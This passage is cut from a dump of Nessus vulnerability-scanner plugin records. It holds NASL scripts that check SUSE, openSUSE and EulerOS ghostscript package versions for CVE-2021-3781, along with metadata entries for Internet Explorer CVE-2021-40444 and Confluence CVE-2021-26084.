'exists_check':['sles-ltss-release-15.1']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n if ('ltss' >< tolower(check)) ltss_caveat_required = TRUE;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ghostscript / ghostscript-devel / ghostscript-x11 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:04", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1273-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-17T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : ghostscript (openSUSE-SU-2021:1273-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2022-09-27T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ghostscript", "p-cpe:/a:novell:opensuse:ghostscript-devel", "p-cpe:/a:novell:opensuse:ghostscript-mini", "p-cpe:/a:novell:opensuse:ghostscript-mini-devel", "p-cpe:/a:novell:opensuse:ghostscript-x11", "p-cpe:/a:novell:opensuse:libspectre-devel", "p-cpe:/a:novell:opensuse:libspectre1", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-1273.NASL", "href": "https://www.tenable.com/plugins/nessus/153457", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1273-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153457);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/27\");\n\n script_cve_id(\"CVE-2021-3781\");\n script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"openSUSE 15 Security Update : ghostscript (openSUSE-SU-2021:1273-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1273-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1184123\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1190381\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/H36LVLBVTFLQTYOKRPFVWGCDCWJQWKLY/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fcf93b5e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3781\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'ghostscript-9.52-lp152.2.7.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ghostscript-devel-9.52-lp152.2.7.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ghostscript-mini-9.52-lp152.2.7.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ghostscript-mini-devel-9.52-lp152.2.7.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ghostscript-x11-9.52-lp152.2.7.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libspectre-devel-0.2.8-lp152.4.3.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libspectre1-0.2.8-lp152.4.3.1', 'cpu':'x86_64', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ghostscript / ghostscript-devel / ghostscript-mini / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:04", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:3044-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-16T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : ghostscript (openSUSE-SU-2021:3044-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2022-09-27T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ghostscript", "p-cpe:/a:novell:opensuse:ghostscript-devel", "p-cpe:/a:novell:opensuse:ghostscript-x11", "p-cpe:/a:novell:opensuse:libspectre-devel", "p-cpe:/a:novell:opensuse:libspectre1", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-3044.NASL", "href": "https://www.tenable.com/plugins/nessus/153413", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:3044-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153413);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/27\");\n\n script_cve_id(\"CVE-2021-3781\");\n script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"openSUSE 15 Security Update : ghostscript (openSUSE-SU-2021:3044-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:3044-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1184123\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1190381\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/M64NXCVRRUDYD4U65CYH2ROCOGMSYF3U/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?554162a4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3781\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'ghostscript-9.52-155.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ghostscript-devel-9.52-155.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ghostscript-x11-9.52-155.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libspectre1-0.2.8-3.12.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ghostscript / ghostscript-devel / ghostscript-x11 / libspectre-devel / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:06", "description": "According to the versions of the ghostscript packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-06-15T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : ghostscript (EulerOS-SA-2022-1863)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2022-09-27T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ghostscript", "p-cpe:/a:huawei:euleros:ghostscript-help", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1863.NASL", "href": "https://www.tenable.com/plugins/nessus/162267", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162267);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/27\");\n\n script_cve_id(\"CVE-2021-3781\");\n script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"EulerOS 2.0 SP9 : ghostscript (EulerOS-SA-2022-1863)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ghostscript packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1863\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb8c10f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ghostscript packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ghostscript-help\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"ghostscript-9.52-1.h5.eulerosv2r9\",\n \"ghostscript-help-9.52-1.h5.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:14:06", "description": "This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-05T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_IE_SEPT_2021.NASL", "href": "https://www.tenable.com/plugins/nessus/153214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2021/09/23. Deprecated due to patch tuesday patches.\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153214);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/05\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus \nPlugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383 ');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-26T15:48:49", "description": "The remote Atlassian Confluence application running on the remote host is affected by an OGNL injection vulnerability that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance by sending a specially crafted HTTP request.", "cvss3": {}, "published": "2021-09-07T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Webwork OGNL Injection (CVE-2021-26084)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2021_26084.NBIN", "href": "https://www.tenable.com/plugins/nessus/153087", "sourceData": "Binary data confluence_cve_2021_26084.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:39", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a memory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. (CVE-2021-40444)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (September 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/153374", "sourceData": 